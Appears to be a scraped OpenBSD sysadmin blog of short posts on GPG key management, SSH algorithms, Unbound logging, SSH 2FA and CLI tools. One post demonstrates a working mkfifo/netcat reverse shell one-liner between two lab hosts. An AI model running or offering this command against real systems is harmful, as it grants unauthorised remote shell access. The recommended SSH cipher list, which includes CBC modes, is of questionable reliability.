OpenBSD

GPG & Gopass & Gitlab

GPG and how to use it

Create a Key with ECC

gpg --expert --full-generate-key
  • (9) ECC and ECC
  • (1) Curve 25519
  • 0 = key does not expire (or whatever you prefer!)
  • Real name: Max Muster
  • Email address: max@muster.net
  • Comment: -
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid                      Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Public Key

max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Private Key

max@host $ gpg -K
/home/max/.gnupg/pubring.kbx
----------------------------
sec   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
ssb   cv25519 2022-09-04 [E]

Export All Keys

ASCII Format

gpg --export --armor > public.key.asc
gpg --export-secret-key --armor > private.key.asc

GPG Format

gpg --output public.gpg --export
gpg --output private.gpg --export-secret-key

Export one Key only

Set Key

keyID=256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E

ASCII Format

gpg --export --armor > $keyID.pub.key.asc $keyID
gpg --export-secret-key --armor > $keyID.key.asc $keyID

GPG Format

gpg --output $keyID.pub.gpg --export $keyID
gpg --output $keyID.gpg --export-secret-key $keyID

Export to QRCode

gpg --export --armor |qrencode -t UTF8
gpg --export-secret-keys --armor |qrencode -t UTF8

Export QRCode to PNG

qrencode -r $keyID.pub.key.asc -o $keyID.pub.png
qrencode -r $keyID.key.asc -o $keyID.png

Delete private Key without asking!

gpg --yes --batch --delete-secret-key $keyID

Delete both Keys without asking!

gpg --yes --batch --delete-secret-and-public-key $keyID

Key Management

List Keys

max@host $ file *key*
private.key:     data
private.key.asc: ASCII text
public.key:      data
public.key.asc:  PGP public key block

Delete Key

keyID=
gpg --delete-secret-key $keyID
gpg --delete-key $keyID

or delete both without asking!

OpenBSD - ReverseShell

Reverse Shells

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)


Any Comments ?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages

Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that.

Connection UPS to APU via USB Cable

dmesg show the UPS connected

APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1
...
uhid21 at uhidev0 reportid 142: input=0, output=0, feature=4

Check sysctl

what kind of information do we get from the hardware sensor ?

SSH - Cipher, Key, MAC

SSH Stuff

Supported Ciphers, Key, MAC on OpenBSD 7.1. Not all of them are good for useage, here is my recommendation.

for your sshd_config / ssh_config

Ciphers                aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes128-cbc

HostKeyAlgorithms      ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,
                       sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256

Kexalgorithms          curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,
                       diffie-hellman-group18-sha512,diffie-hellman-group14-sha256

MACs                   hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com

PubKeyAcceptedKeyTypes ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,
                       rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,
                       ssh-rsa-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-25

List of all available Types

Cipher

ssh -Q cipher
3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
aes128-ctr
aes192-ctr
aes256-ctr
aes128-gcm@openssh.com
aes256-gcm@openssh.com
chacha20-poly1305@openssh.com

HostbasedAcceptedAlgorithms

ssh -Q HostbasedAcceptedAlgorithms
ssh-ed25519
ssh-ed25519-cert-v01@openssh.com
sk-ssh-ed25519@openssh.com
sk-ssh-ed25519-cert-v01@openssh.com
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
sk-ecdsa-sha2-nistp256@openssh.com
webauthn-sk-ecdsa-sha2-nistp256@openssh.com
ssh-rsa-cert-v01@openssh.com
rsa-sha2-256-cert-v01@openssh.com
rsa-sha2-512-cert-v01@openssh.com
ssh-dss-cert-v01@openssh.com
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp521-cert-v01@openssh.com
sk-ecdsa-sha2-nistp256-cert-v01@openssh.com

HostKeyAlgorithms

ssh -Q HostKeyAlgorithms
ssh-ed25519
ssh-ed25519-cert-v01@openssh.com
sk-ssh-ed25519@openssh.com
sk-ssh-ed25519-cert-v01@openssh.com
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
sk-ecdsa-sha2-nistp256@openssh.com
webauthn-sk-ecdsa-sha2-nistp256@openssh.com
ssh-rsa-cert-v01@openssh.com
rsa-sha2-256-cert-v01@openssh.com
rsa-sha2-512-cert-v01@openssh.com
ssh-dss-cert-v01@openssh.com
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp521-cert-v01@openssh.com

KexAlgorithms

ssh -Q KexAlgorithms
diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
curve25519-sha256@libssh.org
sntrup761x25519-sha512@openssh.com
diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
curve25519-sha256@libssh.org
sntrup761x25519-sha512@openssh.com

MAC

Message Authentication Code

OpenBSD - Full Disk Encryption

Intro

I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines. And there, we have FileVault which basically does the same. However, i’d like to give a try with a Test VM. There are plenty of instructions how to setup up, i just tried one and made some notes as usual.

JC - JSON from CLI

how to build json from cli

we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping

add package

doas pkg_add jc

try ping

openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null
{
  "destination_ip": "1.1.1.1",
  "data_bytes": 56,
  "pattern": null,
  "destination": "1.1.1.1",
  "packets_transmitted": 3,
  "packets_received": 3,
  "packet_loss_percent": 0.0,
  "duplicates": 0,
  "round_trip_ms_min": 9.219,
  "round_trip_ms_avg": 9.826,
  "round_trip_ms_max": 10.158,
  "round_trip_ms_stddev": 0.43,
  "responses": [
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 0,
      "ttl": 59,
      "time_ms": 10.158,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 1,
      "ttl": 59,
      "time_ms": 9.219,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 2,
      "ttl": 59,
      "time_ms": 10.101,
      "duplicate": false
    }
  ]
}

Compatible platforms: linux, darwin, freebsd -> had to redirect the stderr to /dev/null because OpenBSD is not (yet) supported officially…

Unbound - Logging

Enable Logging for Unbound

update unbound.conf

/var/unbound/etc/unbound.conf

server:
    logfile: /log/unbound.log
    verbosity: 1
    log-queries: yes
...

create folder/logfile

log=/var/unbound/log/unbound.log
doas mkdir /var/unbound/log/
touch $log
chmod 660 $log
chown _unbound:_unbound $log

restart service

doas rcctl restart unbound

tail logfile

tail -f /var/unbound/log/unbound.log
# tail -f /var/unbound/log/unbound.log
[1660208341] unbound[3279:0] notice: init module 0: validator
[1660208341] unbound[3279:0] notice: init module 1: iterator
[1660208341] unbound[3279:0] info: start of service (unbound 1.15.0).
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. A IN
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. AAAA IN

Any Comments ?

sha256: 2a8843dffec0d8bbd8ff1b2ab4748600dfc57ba00bd87707e1f505c849b89fa3

Unbound - RemoteControl

How to Enable Remote Control for Unbound

Setup Remote Control

doas unbound-control-setup
$ doas unbound-control-setup
setup in directory /var/unbound/etc
Generating RSA private key, 3072 bit long modulus
..................................++++
..................................++++
e is 010001 (0x65537)
Generating RSA private key, 3072 bit long modulus
........................................++++
........................................++++
e is 010001 (0x65537)
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
removing artifacts
Setup success. Certificates created. Enable in unbound.conf file to use

Enable in unbound.conf

/var/unbound/etc/unbound.conf

OpenSSH 2FA Google Auth

Let’s give a try with Alpine Linux, OpenSSH and 2FA with Google Authenticator.

add Packages

apk add openssh openssh-server-pam google-authenticator openssh-doc google-authenticator-doc libqrencode

Configure GoogleAuth

touch /etc/pam.d/sshd
ln /etc/pam.d/sshd /etc/pam.d/sshd.pam

cat << 'EOF' >> /etc/pam.d/sshd.pam
account   include     base-account

auth      required    pam_env.so
auth      required    pam_nologin.so  successok
auth      required    /lib/security/pam_google_authenticator.so   echo_verification_code grace_period=57600 nullok
auth      required    pam_unix.so   md5 sha512
EOF

update sshd_config

cat << 'EOF' >> /etc/ssh/sshd_config
PasswordAuthentication no
AuthenticationMethods any
UsePAM yes
EOF

Restart SSHD

service sshd restart

Setup User

su - USERNAME
google-authenticator

Response

HTMLQ

stumpled upon some thing cool, htmlq! It’s like jq, but for HTML.

Installation Rust

htmlq need rust. so, let’s install rust first.

doas pkg_add rust
cat << 'EOF' |doas tee -a /etc/profile
# Rust/Cargo
export PATH=$PATH:/root/.cargo/bin

EOF
. /etc/profile

Install HTMLQ

doas cargo install htmlq

some Examples

curl -s https://www.openbsd.org | htmlq --attribute href a |head

Example

user@nixbox$ curl -s https://www.openbsd.org | htmlq --attribute href a |head
goals.html
plat.html
security.html
crypto.html
events.html
innovations.html
faq/faq4.html#Download
anoncvs.html
https://cvsweb.openbsd.org/
https://github.com/openbsd
curl --silent https://www.nytimes.com | htmlq a --attribute href -b https://www.nytimes.com

Example